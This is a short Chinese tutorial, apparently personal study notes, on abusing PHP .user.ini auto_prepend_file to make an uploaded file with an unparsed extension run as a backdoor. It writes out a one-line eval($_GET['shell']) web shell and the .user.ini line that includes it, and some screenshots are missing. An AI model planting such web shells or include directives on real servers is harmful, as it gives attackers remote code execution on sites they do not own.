PHP 利用 .user.ini 配合文件上传制造后门

0x00 .user.ini 文件

PHP在php.ini中存储配置选项，这些选项分为以下4种：

注意到其中就提到了.user.ini文件。
查阅官方手册，我们知道其实PHP不单单以php.ini作为配置文件，而是会在网站根目录的所有目录下寻找ini文件。所谓.user.ini其实就是可以由用户自定义的配置文件。
在目录中存在该配置文件时，其中的配置项会优先生效。
另外，PHP确定何种文件为用户自定义配置文件的方法并非固定的：

并且自定义配置被更改后，不需要重启服务器，而是会在指定时间后自动刷新：

0x01 利用方法

user.ini实际上远远没有听起来那么强大。因为其可设定的参数被严格限制了，很多“危险”的参数都属于php_ini_system模式，而这个模式在用户自定义的配置文件中是不能生效的。
在.user.ini风格的配置文件中只有具有PHP_INI_PERDIR和PHP_INI_USER模式的设置可被识别。
在这些设置中，有两个配置项可以被用来配合文件上传制造后门：

配置项	描述
auto_prepend_file	指定一个文件，在任何php文件运行前会将这个文件require进来。
auto_append_file	类似前一选项，区别是包含目标文件在php尾部执行。当该文件调用了exit()时无效。

示例1

同目录下构建两个文件：

//test1.php
 
echo 'this is test1';
?>

//test2.php
 
echo 'this is test2';
?>

另外将以下内容写入.user.ini：

auto_prepend_file=test2.php

打开test1.php，得到页面内容为

可见，test2.php在文件test1.php运行前就被加载进来了。

示例2

同理，如果文件上传过程中成功上传了某个木马文件，但是由于一些原因无法被服务器解析或是调用，就可以考虑使用.user.ini更改php文件运行模式，使用上述配置项使目录下其他php文件强行将该文件包含进来，以使木马文件成功解析运行。
我们将test2.php改为以下内容：

eval($_GET['shell']);
?>

修改后缀：

尝试访问，发现并没有被解析运行。
(此处模拟这是一个目标服务器上我们成功上传却未能解析运行的一句话马)
我们在同目录下创建.user.ini，内容为：

auto_prepend_file=test2.unknow

然后带着参数shell访问test1.php

发现test1.php成功将test2.unknow所含php源码运行。

0x02 参考资料

https://www.php.net/manual/zh/configuration.file.per-user.php
https://wooyun.js.org/drops/user.ini…

(个人整理，如有错误欢迎指正)